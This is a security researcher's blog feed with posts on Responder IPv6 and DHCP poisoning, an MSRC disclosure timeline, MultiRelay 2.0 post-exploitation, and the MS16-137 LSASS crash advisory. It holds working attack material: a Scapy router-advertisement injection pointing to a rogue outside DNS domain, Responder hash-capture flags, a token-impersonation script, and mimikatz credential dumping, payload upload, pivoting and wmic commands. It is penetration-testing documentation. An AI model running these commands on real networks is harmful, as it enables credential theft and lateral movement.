tag:blogger.com,1999:blog-32474523301056354252024-03-08T03:34:06.138-08:00Laurent Gaffié blogThis blog reflects my own opinions.Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.comBlogger36125tag:blogger.com,1999:blog-3247452330105635425.post-40943066720740469842021-12-21T18:17:00.008-08:002021-12-21T20:43:58.586-08:00Responder and IPv6 attacks<p> Responder 3.1.1.0 comes with full IPv6 support by default, which allows you to perform more attacks on IPv4 and IPv6 networks. As pointed by several people over the years, Responder has always been lacking of IPv6 support and missed several attack paths, especially when it comes to IPv6 only networks or even mixed IPv4/IPv6 since IPv6 is always the preferred stack on Windows.<br /><br />Responder also comes with a basic DNS server answering to A, SRV and now AAAA records. Tools like <a href="https://github.com/dirkjanm/mitm6" target="_blank">mitm6</a> can be used to get IPv6 traffic (via DHCPv6) and Responder will take care of answering the resulting IPv6 and IPv4 DNS requests.<br /><br />While working on Responder IPv6 implementation i started to wonder how could it be possible to inject some network settings on IPv4 hosts with a static IP, such as a Windows domain controller. One of the great thing about IPv6 implementation, from a pentester standpoint, is that you don't need to be on an IPv6 enabled network to successfully conduct these attacks.<br /></p><h3 style="text-align: left;">IPv6 <span class="ILfuVd"><span class="hgKElc">Router Advertisement</span></span>:</h3><div style="text-align: left;">Since DHCPv6 had already been pretty well covered by <a href="https://twitter.com/_dirkjan">@_dirkjan</a> with mitm6, and since we are primarily targeting hosts with a static address, ICMPv6 Router Advertisement seemed like a good option. In this case, we don't need to inject a route, or even an IP, the ideal goal would be a DNS server, which is possible on any Windows workstation/servers even when their IPv4 DNS settings are static, <b>but not on a domain controller.</b></div><div style="text-align: left;"><b> </b></div><div style="text-align: left;"><h3 style="text-align: left;"><b><span>IPv6 RA DNS / DNSSL:</span></b></h3><div style="text-align: left;">Since I was not able to either inject an IPv6 IP or DNS server on the domain controller, the only option left was DNSSL <b><a href="https://datatracker.ietf.org/doc/html/rfc6106">(RFC 6106)</a></b>.</div><div style="text-align: left;">DNSSL allows you to provide a DNS suffix or also commonly known as DNS Search List. For example, if you're part of the domain name "test.local" and your workstation name is desktop-123, the FQND would be "desktop-123.test.local" and the DNS suffix would be "test.local".</div><div style="text-align: left;"><h4 style="text-align: left;">Scapy to the rescue:</h4></div><div style="text-align: left;"><a href="https://github.com/secdev/scapy">Scapy</a> is a great tool/library to quickly test this kind of payload on your network.<br />The following Python proof of concept will add a DNS suffix on a domain controller (server 2019, with latest updates):</div><blockquote><div style="text-align: left;">>>> from scapy import all<br /><br />>>> ra = IPv6 (dst = 'FF02::1')/ICMPv6ND_RA (routerlifetime = 0, reachabletime = 0, prf = 0)/ICMPv6NDOptDNSSL (lifetime = 120, searchlist = ['data.rogueserver.live'])<br /><br />>>> send(ra)<br /></div></blockquote><p>These lines means send a multicast ICMPv6 Router advertisement to 'FF02::1', router lifetime and reachabletime is set to 0 and we inject a DNSSL called 'data.rogueserver.live' with a lifetime of 2 minutes; We don't want to mess for too long, since every hosts listening for ICMPv6 RA advertisement multicast, will get poisoned with that DNSSL.</p><h3 style="text-align: left;">Effect on The Domain Controller:</h3><div style="text-align: left;">Basically, every DNS requests that were not resolved by the DNS server (domain controller) will be sent to 'data.rogueserver.live'. So for example, if your workstation is joined to the "corp.local" domain, and it's looking for "wpad.corp.local" and that entry does not exist then the PDC will issue a DNS lookup (before NBT-NS/LLMNR -if enabled-) for "wpad.data.rogueserver.live".<br /><br />This should not cause much disruption on the network since normal DNS queries will be first resolved by the domain controller, actually most home modem/router usually has a '.lan' '.local' DNS suffix and those DNS requests goes unanswered all the time.</div><div style="text-align: left;"> </div><div style="text-align: left;"><h3 style="text-align: left;">Responder Attack:</h3><div style="text-align: left;"> Now that we have successfully injected a DNS suffix on the domain controller, we need to exploit it.<br />Steps are similar to SSRF, SQLI, XXE exfiltration, first you need a cheap domain name, like 'rogueserver.live' and a server on the internet.<br /><br />Next step is to configure DNS settings on your domain name:<br /><ul style="text-align: left;"><li>Set an A record like 'rogueserver.live' for your domain name pointing to your server IP.</li><li>Set another A record like 'ns.rogueserver.live' for your domain name pointing to you server IP</li><li>set a NS record for 'data.rogueserver.live' pointing to 'ns.rogueserver.live'</li><li>set 2-3 NS records for 'rogueserver.live' pointing to your DNS provider. Usually ns1.provider.com, ns2.provider.com, etc.</li></ul>DNS has been setup, now comes the Responder part. First, i had to update Responder's DNS server to take care of the pseudo-record OPT for <span>EDNS since every requests coming from the PDC will have an OPT additional record <a href="https://datatracker.ietf.org/doc/html/rfc7873" target="_blank">(RFC 7873)</a>. <br /></span></div><div style="text-align: left;"> </div><div style="text-align: left;">You need two instances of Responder. One on the target local network, let's say hosted on 192.168.0.175 and one instance on the internet.</div><div style="text-align: left;"> </div><div style="text-align: left;">The instance on the internet will be used as a rogue DNS server, answering to the domain controller with the local IP of the other Responder instance hosted on the local network.</div><div style="text-align: left;"></div><div style="text-align: left;">The attack looks like that on the VPS Responder instance:</div><div style="text-align: left;"> </div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhsbHK3JGlz4w4c1XfhjgcVAHzLKjpDQYOghVbigybLduNj9IPYWU5GpLkJEFziYSNDurX3pzpgUuPuShcecYELus4U_O0c0IIIrTbNaFU0eCdxtIuzB3fkV2hI-jL_O-rIcHFo960iM2-ravyGCtkNqo7R_3q-HS9z5noIkuB_zUOXBq05mjEujofG=s1019" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="337" data-original-width="1019" height="212" src="https://blogger.googleusercontent.com/img/a/AVvXsEhsbHK3JGlz4w4c1XfhjgcVAHzLKjpDQYOghVbigybLduNj9IPYWU5GpLkJEFziYSNDurX3pzpgUuPuShcecYELus4U_O0c0IIIrTbNaFU0eCdxtIuzB3fkV2hI-jL_O-rIcHFo960iM2-ravyGCtkNqo7R_3q-HS9z5noIkuB_zUOXBq05mjEujofG=w518-h212" width="518" /></a></div><div style="text-align: left;">Here, we are using Responder with the -e option, which poison the request with an IP of our choice, in this case a local IP (192.168.0.175), poisoned from the internet.</div><div style="text-align: left;"><br /></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;">And on the other Responder instance (192.168.0.175), which is located on the local network where the target PDC is located:<br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEixa27LDTo22ETtQlJYxpD5vF4z934B2Cy5sBA7llL3gC5WSMTDghCMNgnGSm5Np-h4YQDA_oOlLhxJShzDfaTbMFKx-sHSqkJ-XGMxKEooW9DPOAwoqBuvl485m8lUcpvHI830SdYtNan7_L6QRIVrnkhGFzCYCw5XEYdbo-j2nJ-ebVWXu-U_4F6W=s803" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="184" data-original-width="803" height="146" src="https://blogger.googleusercontent.com/img/a/AVvXsEixa27LDTo22ETtQlJYxpD5vF4z934B2Cy5sBA7llL3gC5WSMTDghCMNgnGSm5Np-h4YQDA_oOlLhxJShzDfaTbMFKx-sHSqkJ-XGMxKEooW9DPOAwoqBuvl485m8lUcpvHI830SdYtNan7_L6QRIVrnkhGFzCYCw5XEYdbo-j2nJ-ebVWXu-U_4F6W=w640-h146" width="640" /></a></div></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><h3 style="text-align: left;">Additional Remarks:</h3><div style="text-align: left;">With that DNS suffix injected, any sysadmin on the network who mistype a name like 'pdc02' instead of 'pdc-02' will get poisoned, since the name wont be resolved by active directory DNS server, and our rogue server will resolve it. Basically, it will act as what LLMNR/NBT-NS use to do before it was disabled; Resolving queries that were not resolved by the domain controller, but with the priority of a DNS lookup.</div><div style="text-align: left;"><br /></div></div></div><h3 style="text-align: left;">Remediation:</h3><div style="text-align: left;">Disable IPv6 on the domain controller if it's not necessary. <br />If IPv6 is necessary on your network, look for switch security option such as RAguard on cisco.</div></div><p><br /></p>Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-78297701944579523772021-08-19T04:45:00.002-07:002021-12-13T15:54:49.214-08:00Responder's DHCP Poisoner<p> Responder 3.0.7.0 comes with a new DHCP poisoner module. This module allows you to remotely inject a WPAD server with no user interaction (0 click) and capture/relay NTLM credentials on all Windows versions ranging from Windows 98 to the current version (Windows 11, Server 2022).</p><h4 style="text-align: left;">WPAD and DHCP<br /></h4><div style="text-align: left;"> Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution.</div><div style="text-align: left;"><br />WPAD configuration is currently provided in <a href="https://docs.microsoft.com/en-us/previous-versions/tn-archive/bb794881(v=technet.10)" target="_blank">DHCP option 252</a>.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The DHCP protocol is quite old (1993), and doesn't provide any relevant security. Requests are broadcast, can be relayed across subnets with DHCP relay and obviously anyone on a subnet who can answer more rapidly than the actual DHCP server can inject any network settings on the client who issued the DHCP request.</div><div style="text-align: left;"><br /></div><div style="text-align: left;"><h4 style="text-align: left;">Spoofing DHCP challenges</h4><div style="text-align: left;">Spoofing DHCP responses with no disruption can be challenging since you're interfering with a workstation network configuration. Usually, you need to have very good knowledge of the target subnet, where is the DNS server, where is the switch, routing table, domain, netmask, DHCP server, etc. Any mistake with these settings will result in disruption on the network.</div><div style="text-align: left;"> </div><div style="text-align: left;">However, spoofing DHCP answers has unique benefits. It's definitely stealthier than ARP poisoning; One unicast response is sufficient to permanently poison a victim's routing information, it's also common to see multiple DHCP servers operating on a network. Unicast DHCP answers are more complex to detect, a few switch provides security settings to prevent DHCP snooping, however those settings are not straightforward and <u>are often misconfigured when enabled</u>.<br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><h4 style="text-align: left;">Responder approach<br /></h4></div><div style="text-align: left;"> Previous Responder version included <a href="https://github.com/lgandx/Responder/wiki/DHCP-Server" target="_blank">a DHCP.py script in the tool folder</a>. This script was not the easiest to operate and the fear of causing disruption on client networks made it a "last option" tool.</div><div style="text-align: left;"></div><div style="text-align: left;"> </div><div style="text-align: left;">Responder 3.0.7.0 changed that and DHCP poisoning is completely automated and cause no disruption on the network.</div><div style="text-align: left;">To understand how Responder do that, you need to understand how DHCP works, <br />A client performs a broadcast DHCP REQUEST when the workstation is restarted, when the network adapter is enabled or simply when the DHCP lease expires (usually a few hours), the DHCP server reply with a DHCP ACK answer containing all network settings and additional options.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Responder takes advantage of that and race against the legit DHCP server to answers with a DHCP ACK containing invalid network settings, a valid WPAD server (Responder IP) and a very short lease time (10 seconds).</div><div style="text-align: left;"> </div><div style="text-align: left;">The workstation gets the WPAD server injected and will issue a new DHCP request right after, Responder will let the legit DHCP server do its job and provide the right network settings. </div><div style="text-align: left;"> </div><div style="text-align: left;">Due to Windows DHCP client design, an injected WPAD server is permanent until next reboot regardless if another DHCP server provides a new configuration :)<br /></div><div style="text-align: left;"><br /></div><div style="text-align: left;">A maximum of 4 spoofing attempts by MAC address has been configured in the DHCP module, which should be more than enough to get the WPAD server injected.<br /></div><div style="text-align: left;"> </div><div style="text-align: left;"><h4 style="text-align: left;">How to run it:</h4><div style="text-align: left;">The new DHCP module is disabled by default, you can enable it with the -d command line option.</div><div style="text-align: left;"><strike>When enabled, you need to edit Responder.conf and update the WPADScript setting:<br /></strike><blockquote><strike>WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY <b>ProxySrv</b>:3128; PROXY <b>ProxySrv</b>:3141; DIRECT';}</strike></blockquote></div><div style="text-align: left;"><strike>The text in bold should be replaced with your Responder IP address, because LLMNR/NBT-NS is likely disabled, so you want to avoid any lookups going unanswered and lose valuable NTLM hashes.</strike><span class="ILfuVd"><span class="hgKElc"><b><br /><br /></b>Wpad script configuration is automated,</span></span> the next step is to launch Responder with the following arguments:</div><div style="text-align: left;">./Responder.py -I eth0 -r<b>Pd</b>v</div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"><br />Why -P and not -F? Nowadays, WPAD NTLM authentication is unlikely successful, therefore forcing NTLM authentication on wpad.dat retrieval is not recommended. The concept is to serve the wpad.dat file with no user authentication, and as soon the client starts using our proxy, we force authentication with the Proxy-Auth module :)<br /><br />When a WPAD server is injected, the user on the workstation doesn't need to open or do anything, NTLM hashes starts to flow in Responder automatically.<br /></div><div style="text-align: left;"><h4 style="text-align: left;">Final words</h4><div style="text-align: left;">This Responder version is currently available for our sponsors on <a href="https://porchetta.industries" target="_blank">Porchetta Industries</a>. </div><div style="text-align: left;">This functionality will be released publicly for everyone else in a few months on github.</div><div style="text-align: left;">Porchetta Industries is a unique platform allowing tool makers to be sponsored for their work and tools they provides freely to the security community at large.</div><div style="text-align: left;">For more information, visit: <a href="https://porchetta.industries">https://porchetta.industries</a></div></div></div><div style="text-align: left;"> </div><div style="text-align: left;"> </div></div>Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-51407912505411167212021-04-07T21:06:00.016-07:002021-06-02T18:29:33.655-07:00 Status of Submitted Vulnerabilities To MSRC <p>This list is intended to give vague information about submitted bugs,
but important information about communication process and timeline.</p><h4 style="text-align: left;">
Bug Title: Microsoft <span class="_Tgc">SMBv1 Disabled; Not Fully Disabled.<br /></span></h4>
<ul style="text-align: left;"><li>Affected software: Microsoft Servers 2019, 2016, 2012.<span class="_Tgc"></span></li><li>Type:Protocol Implementation Issue.<br /></li><li>Submitted: 07/04/2021</li><li>Coordinated disclosure agreement expiration: 13/07/2021.</li><li>Notes and updates: <br /><br />-Complete detail was sent on 07/04/2021, ACK by MSRC on 08/04/2021.<br /><br />- MSRC ask for PoC<br /><br />- PoC sent with extra details.<br /><br />- MSRC ask to extend deadline to 13/07/2021 instead of 07/07/2021 since their July release is the 13th.<br /><br />- Agreed to MSRC's request and offer to provide more details if needed.<br /><br />- Requested update to MSRC on 16/04/2021<br /><br />- MSRC responded the 19/04/2021 and asked what is the security issue with having NetBIOS enabled by default.<br /><br />- A complete description on why it is a security concern was sent the same day.<br /><br />- on 21/04/2021 a status update was requested.<br /><br />- MSRC answer on May 7th, and asserts multiple falsehoods about the protocol in question, referring to MSFT documentation, and states that NTLM messages are safe even when intercepted. Additionally, MSRC mention that I'm allowed to blog/disclose this issue.<br /><br />- A lengthy factual answer is sent back on May 9th, detailing the incoherence in both MSRC answer and MSFT documentation. Especially when publicly available NT4/Windows XP source code directly contradicts the said MSFT documentation. MSRC was also asked to run MultiRelay in conjunction with Responder in an A-D lab environment, and confirm if NTLM message are really that safe when intercepted. A temporary hold on disclosure was offered until the said email is assessed. <br /><br />- MSRC answers on May 10th, stating that they will review the "added submissions".<br />
<br />- On may 26th, MSRC responded stating that they finally understood the issue and will be working on a fix. <br /></li></ul><ul style="text-align: left;"><li>*Check for more updates*.</li></ul><p> </p><p> </p>Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-30752773047709162252017-03-31T10:21:00.000-07:002017-03-31T10:55:25.343-07:00MultiRelay 2.0: Runas, Pivot, SVC, and Mimikatz Love.<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<br />
<h3 style="text-align: left;">
Introduction: </h3>
<div style="text-align: left;">
If you haven't read the <a href="http://g-laurent.blogspot.com/2016/10/introducing-responder-multirelay-10.html" target="_blank">initial MultiRelay introduction post</a>, I strongly invite you to read it. </div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
MultiRelay Description:</h3>
<div style="text-align: left;">
MultiRelay 2.0 is a powerful -professional grade- pentest utility included in Responder's tools folder, giving you the ability to perform targeted NTLMv1 and NTLMv2 relay and post exploitation on a selected target.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
New Functionalities: </h3>
<div style="text-align: left;">
Several new functionalities were added to the MultiRelay shell interface, those are listed below:</div>
<ul style="text-align: left;">
<li>Upload a file on the target:<br />Using the "upload" command, a user can push any file using the SMB
protocol on the compromised target. The file will be uploaded in
c:\Windows\Temp\</li>
</ul>
<ul style="text-align: left;">
<li>Delete a file on the target:<br />Using the "delete" command, a user can delete any file using the SMB
protocol on the compromised target. If the file has been successfully
deleted, no errors will be shown.</li>
</ul>
<ul style="text-align: left;">
<li>Run a command as the currently logged in user:<br />Using the "runas" command, a user will be able to launch a service
which will run a command as the currently logged in user.</li>
</ul>
<ul style="text-align: left;">
<li>Pivot to another host, using the currently logged in user's sets of credentials.<br />Using the "pivot" command, a user will attempt to propagate to another host (Lateral movement).</li>
</ul>
<ul style="text-align: left;">
<li>Run remote Mimikatz (32-bit, 64-bit) RPC commands:<br />Using the "mimi" or "mimi32" command, the user will be able to interact with mimikatz RPC on the target.</li>
</ul>
<ul style="text-align: left;">
<li>Scan the current /24 or /16 in order to find other hosts to pivot to:<br />When using the "scan /24" command, a user will be able to scan the entire class C and chose another host to pivot to. </li>
</ul>
<ul style="text-align: left;">
<li>Run a local command on the local system:<br />Any other command will launch a service which will run a command as LocalSystem.</li>
</ul>
<br />
<div style="text-align: left;">
Since the previous version 2 new options were added:</div>
<ul style="text-align: left;">
<li>-c Run a command as system then exit (scripting).<br /> </li>
<li>-d Dump the SAM database then exit (scripting).</li>
</ul>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
Good Things To Know:</h3>
<ul style="text-align: left;">
<li><span style="font-weight: normal;">All binaries used by MultiRelay are stored in ./tools/MultiRelay/bin/ <br /> </span></li>
<li><span style="font-weight: normal;">Filenames for these binaries are specified in MultiRelay.py, starting at line 48:<br />MimikatzFilename = "./MultiRelay/bin/mimikatz.exe"<br />Mimikatzx86Filename = "./MultiRelay/bin/mimikatz_x86.exe"<br />RunAsFileName = "./MultiRelay/bin/Runas.exe"<br />SysSVCFileName = "./MultiRelay/bin/Syssvc.exe"<br /></span></li>
<li><span style="font-weight: normal;">Any binaries can be replaced with your own, simply make sure to change the name accordingly in MultiRelay.py.<br /></span></li>
<li><span style="font-weight: normal;">The upload local path is ./tools/. If you put your payloads in ./tools/MultiRelay/, you'll have to run: upload MultiRelay/custompayload.exe. Best is to provide the full path.<br /></span></li>
<li><span style="font-weight: normal;">If you have some sets of credentials, you can use MultiRelay without relaying an NTLM hash. On one screen point MultiRelay to your target and on another one run: smbclient -U user%password -W domain //Your_IP/c$<br /></span></li>
<li><span style="font-weight: normal;">Think about the command you're about to launch before launching it. Uploading your custom version of mimikatz and running "mimikatz" will keep the process hanging and you wont be able to delete the file unless you're using taskkill /F /IM file.exe. For custom mimikatz command usage with MultiRelay, please refer to the MultiRelay 2.0 Wushu section. <br /></span></li>
</ul>
<h3 style="text-align: left;">
NTLM Relay Lateral Movement:</h3>
<div style="text-align: left;">
MultiRelay philosophy is that any successful NTLM Relay <a href="https://github.com/lgandx/Responder/blob/master/tools/MultiRelay/RelayMultiCore.py#L478" target="_blank">is precious and everything should be done to keep that</a><a href="https://github.com/lgandx/Responder/blob/master/tools/MultiRelay/RelayMultiCore.py#L478" target="_blank"> </a><a href="https://github.com/lgandx/Responder/blob/master/tools/MultiRelay/RelayMultiCore.py#L478" target="_blank">SMB connection alive.</a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Getting command execution via NTLM Relay is commonly achieved via SVCCTL:</div>
<ul style="text-align: left;">
<li>Open IPC$ named pipe \SVCCTL -> create a service with your command -> start the service -> get the output -> done.</li>
</ul>
<div style="text-align: left;">
While running commands as SYSTEM is cool, you can't do much on the network with this user, meaning that you cannot access other network resources with a local system account. <br />
This limits the compromise to only one host at the time, and you might wait a long time before another administrator hash flies over the wire...</div>
<div style="text-align: left;">
While building MultiRelay 1.0, I thought it would be nice to execute commands as the currently logged in user in the next version and have the ability to pivot across the network. When I started to work on MultiRelay 2.0 I made a 5 lines python script (Runas.py) which impersonate
a logged in user:<br />
<br /></div>
<blockquote class="tr_bq">
<div style="text-align: left;">
import sys, win32ts, win32process, win32con<br />
<br />
SessionID = win32ts.WTSGetActiveConsoleSessionId()<br />
UserToken = win32ts.WTSQueryUserToken(SessionID)<br />
h,tn,pi,ti = win32process.CreateProcessAsUser(UserToken, "c:\\Windows\\system32\\cmd.exe", "/c "+' '.join(sys.argv[1:]), None, None, True, win32con.NORMAL_PRIORITY_CLASS, None, None, win32process.STARTUPINFO())</div>
<blockquote class="tr_bq">
<br /></blockquote>
</blockquote>
<div style="text-align: left;">
As stated in <a href="https://msdn.microsoft.com/en-us/library/aa383835(v=vs.85).aspx" target="_blank">WTSGetActiveConsoleSessionId MSDN documentation</a><br />
WTSGetActiveConsoleSessionId "Retrieves the session identifier of the console session. The console
session is the session that is currently attached to the physical
console. Note that <u>it is not necessary that Remote Desktop Services be
running for this
function to succeed</u>".<br />
Once we have the session ID, we use the <a href="https://msdn.microsoft.com/en-us/library/aa383840(v=vs.85).aspx" target="_blank">WTSQueryUserToken</a> function to retrieve the Token associated with the previously acquired Session ID, and call <br />
<a href="https://msdn.microsoft.com/en-us/library/windows/desktop/ms682429(v=vs.85).aspx" target="_blank">CreateProcessAsUser</a> with our command.</div>
<div style="text-align: left;">
In short, we're able to impersonate any logged in user and re-use their credentials and resource access across the network. This opens a whole new kind NTLM Relay attack vector: Propagation and mass compromises resulting from 1 relayed authentication.</div>
<h4 style="text-align: left;">
Teaming up with @gentilkiwi:</h4>
<div style="text-align: left;">
Earlier versions of MultiRelay used this python script compiled with pyinstaller which generated a pretty big file from a 5 python lines script... <a href="https://twitter.com/gentilkiwi" target="_blank">@gentilkiwi</a> jumped in and said "I think I can do way better", and he did.<br />
@gentilkiwi developed a custom mimikatz RPC server, added more token impersonation options, the ability to run mimikatz as a service and he also took care of bringing Runas.exe to a decent size of 9k while I was working on Mimikatz RPC client and all the other MultiRelay functionalities.</div>
<div style="text-align: left;">
<br />
These new Mimikatz functionalities allows MultiRelay to interact stealthily with Mimikatz and use without restriction all of the power this awesome tool gives us. </div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<h3 style="text-align: left;">
</h3>
<h3 style="text-align: left;">
MultiRelay 2.0 Wushu: </h3>
<div style="text-align: left;">
Below are listed some post exploitation attack examples:</div>
<ul style="text-align: left;">
<li>Mimikatz RPC:<br />Get all available token, impersonate one user and run a command as this user:<br /><ul>
<li>C:\Windows\system32\:#mimi token::list </li>
<li>C:\Windows\system32\:#mimi token::run /user:User_To_Impersonate /process:Command_To_Run</li>
</ul>
<ul>
<li>C:\Windows\system32\:#mimi token::run /user:Administrator /process:whoami</li>
</ul>
Get all logon passwords:<br /><ul>
<li>mimi sekurlsa::logonpasswords</li>
</ul>
Etc, all regular mimikatz commands are available on the RPC interface<br /></li>
<li>Upload your custom mimikatz or payload and run it:<br />Upload an executable and launch it from Windows/Temp/ as system. <br /><ul>
<li> C:\Windows\system32\:#upload path/to/mimikatz.exe</li>
<li> C:\Windows\system32\:#%windir%\Temp\mimikatz.exe "sekurlsa::logonpasswords" exit </li>
</ul>
<u>The exit command is very important</u> with mimikatz, if you don't use it mimikatz will stay loaded and <u>the command will fail</u>.<br />Note: If you need to run your executable as the currently logged in user, use:<ul>
<li>C:\Windows\system32\:#runas %windir%\Temp\Filename.exe args</li>
</ul>
Now delete the file:<br /><ul>
<li>C:\Windows\system32\:#delete /Windows/Temp/mimikatz.exe</li>
</ul>
</li>
<li>Scan the current class C and pivot to another host:<br />
<ul>
<li>C:\Windows\system32\:#scan /24<blockquote class="tr_bq">
...[snip]...<br />
['192.168.1.141', Os:'Windows Server 2016 Standard 14393', Domain:'SMB3', Signing:'True']<br />
['192.168.1.142', Os:'Windows Server 2012 R2 Datacenter 9600', Domain:'SMB3', Signing:'False']<br />
['192.168.1.144', Os:'Windows 5.1', Domain:'SMB3', Signing:'False']<br />
['192.168.1.145', Os:'Windows Server 2012 R2 Datacenter 9600', Domain:'SMB3', Signing:'False']<br />
...[snip]...</blockquote>
</li>
</ul>
<ul>
<li> C:\Windows\system32\:#pivot 192.168.1.145<br /><blockquote class="tr_bq">
[+] Pivoting to 192.168.1.145.<br />
Connected to 192.168.1.145 as LocalSystem.</blockquote>
</li>
</ul>
</li>
<li>Run a command as the currently logged in user:<br /><ul>
<li>C:\Windows\system32\:#runas whoami<blockquote class="tr_bq">
smb3\lgandx </blockquote>
</li>
</ul>
</li>
<li>Execute commands on the PDC remotely and read the output:<br /><ul>
<li>Mount the PDC C:\ drive:</li>
<li>C:\Windows\system32\:#runas net use g: \\smb3.local\c$<br /><blockquote class="tr_bq">
The command completed successfully.</blockquote>
</li>
<li>C:\Windows\system32\:#runas wmic /node:smb3.local process call create "cmd /c whoami^>c:\results.txt"<blockquote class="tr_bq">
Executing (Win32_Process)->Create()<br />
Method execution successful.<br />
Out Parameters:<br />
instance of __PARAMETERS<br />
{<br />
ProcessId = 1068;<br />
ReturnValue = 0;<br />
};</blockquote>
</li>
</ul>
<ul>
<li>Note: When using special DOS characters with wmic, they need to be escaped with a ^. Example: whoami^>c:\results.txt</li>
<li>C:\Windows\system32\:#runas more g:\results.txt<br /><blockquote class="tr_bq">
smb3\lgandx </blockquote>
</li>
</ul>
<br />
These are just a few examples of what MultiRelay allows you to accomplish on a Windows active directory environment, for the rest it's up to your imagination.<br />
<br />
</li>
</ul>
<h3>
Final Words: The donation campaign</h3>
I work as an independent
contractor/pentester and I get pretty busy these days. When I work on
Responder, I end up working for free for the community and losing money I
could make with my contracts, especially when a set of new
functionalities or research takes up to a month, full time.<br />
<br />
Therefore
a donation campaign was launched a few month ago in order to get some
funding for this project, and I think it was a success. More than 50
pentesters around the world and 3 companies donated to this project,
therefore supporting the development of this set of free tools used in
your everyday internal pentests.<br />
<br />
I would like to thank all the independent penetration testers who donated and these 3 companies:<br />
<ul>
<li>SecureWorks : <a href="https://www.secureworks.com/">https://www.secureworks.com/</a></li>
</ul>
<ul>
<li>Black Hills Information Security: <a href="http://www.blackhillsinfosec.com/">http://www.blackhillsinfosec.com/</a></li>
</ul>
<ul>
<li>TrustedSec: <a href="https://www.trustedsec.com/">https://www.trustedsec.com/</a></li>
</ul>
And all, ALL the pentesters around the world who donated to this project.</div>
<div>
Your donations made this version happen.</div>
<div>
</div>
<div>
Oh, I almost forgot, you can download Responder and MultiRelay 2.0 here:<br />
<a href="https://github.com/lgandx/Responder">https://github.com/lgandx/Responder</a></div>
<div>
<br /></div>
<div>
Happy hacking!</div>
</div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-65963656003817327002016-11-08T14:07:00.000-08:002016-11-08T14:32:46.381-08:00MS16-137: LSASS Remote Memory Corruption Advisory<div dir="ltr" style="text-align: left;" trbidi="on">
Title: LSASS SMB NTLM Exchange Remote Memory Corruption<br />
Version: 1.0<br />
Issue type: Null Pointer Dereference<br />
Authentication: Pre-Authenticated<br />
Affected vendor: Microsoft<br />
Release date: 8/11/2016<br />
Discovered by: Laurent Gaffié<br />
Advisory by: Laurent Gaffié<br />
Issue status: Patch available<br />
Affected versions: Windows: XP/Server 2003, Vista, 7, 2008R2, Server 2012R2, 10. <br />
=================================================<br />
<br />
A vulnerability in Windows Local Security Authority Subsystem Service (LSASS) was found on Windows OS versions ranging from Windows XP through to Windows 10. This vulnerability allows an attacker to remotely crash the LSASS.EXE process of an affected workstation with no user interaction.<br />
Successful remote exploitation of this issue will result in a reboot of the target machine. Local privilege escalation should also be considered likely.<br />
Microsoft acknowledged the vulnerability and has published an advisory and a patch, resolving this issue.<br />
<br />
<br />
Technical details<br />
-----------------<br />
<br />
This vulnerability affects both LSASS client and server and can be triggered remotely via SMBv1 and SMBv2, during the NTLM message 3 (Authenticate) message. Incoming NTLM messages via SMB are using ASN1 and DER encoding, the first ASN length field can be set to unsigned int by using 0x84.<br />
This allows an attacker to remotely allocate a huge chunk of memory, for a message never larger than 20000 chars. The secondary trigger is to set any string fields (User, Domain, session Key, MIC, etc) with a long string (80-140 chars), leading LSASS.exe to crash.<br />
<br />
eax=00000000 ebx=000e3e04 ecx=fffffff8 edx=fffffffc esi=000e3e00 edi=00000004<br />
eip=7c84cca2 esp=00aaf9ac ebp=00aaf9d4 iopl=0 nv up ei pl nz ac po cy<br />
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213<br />
ntdll!RtlpWaitOnCriticalSection+0xdf:<br />
7c84cca2 ff4014 inc dword ptr [eax+14h] ds:0023:00000014=????????<br />
<br />
STACK_TEXT: <br />
00aaf9d4 7c83cfd7 00000b3c 00000004 00000000 ntdll!RtlpWaitOnCriticalSection+0xdf<br />
00aaf9f4 4ab82f4a 000e3e00 00aafbec 00000000 ntdll!RtlEnterCriticalSection+0xa8 <-- Is used with a null pointer<br />
00aafa18 4ab82765 000e3de8 ffffffff 00000001 lsasrv!NegpBuildMechListFromCreds+0x25 <-- Uses a null creds.<br />
00aafbfc 4abc8fbb 00000001 00aafe40 000e3de8 lsasrv!NegBuildRequestToken+0xd9<br />
00aafc34 4abca13f 000e3de8 00120111 00000010 lsasrv!NegGenerateServerRequest+0x2a<br />
00aafc98 4ab85edb 000e3de8 00000000 00aafe40 lsasrv!NegAcceptLsaModeContext+0x344<br />
